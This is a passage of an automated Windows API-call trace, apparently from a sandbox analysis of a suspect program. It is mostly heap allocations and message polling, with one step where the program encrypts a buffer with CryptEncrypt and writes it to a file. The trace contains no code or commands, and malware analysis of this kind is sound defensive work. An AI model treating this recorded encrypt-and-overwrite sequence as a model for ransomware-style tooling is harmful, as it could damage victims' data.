dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0187.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0187.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0187.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0187.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0187.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0187.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0187.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0187.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0187.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0187.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0187.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0187.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0187.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0187.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0187.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0187.778] CharLowerBuffW (in: lpsz="byte[71272]", cchLength=0xb | out: lpsz="byte[71272]") returned 0xb [0187.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0187.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0187.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0187.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0187.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0187.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c02d20 | out: hHeap=0x970000) returned 1 [0187.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0187.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c14388 | out: hHeap=0x970000) returned 1 [0187.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0187.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0187.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ad0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0187.867] CryptEncrypt (in: hKey=0xa87390, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf16b0*, pdwDataLen=0x8cef60*=0x11660, dwBufLen=0x11668 | out: pbData=0x3bf16b0*, pdwDataLen=0x8cef60*=0x11668) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0187.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0187.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0187.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0187.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0187.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0187.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0187.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0187.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0187.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0187.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0187.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0187.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0187.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0187.878] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.878] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0187.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.878] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0187.878] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0187.878] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0187.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.879] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0187.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.879] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.879] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0187.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0187.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0187.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0187.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0187.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0187.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0187.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.927] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0x11668, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0x11668, lpOverlapped=0x0) returned 1 [0187.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0187.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0187.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0187.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0187.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0187.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0187.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0187.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0187.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0187.982] RtlAllocateHeap 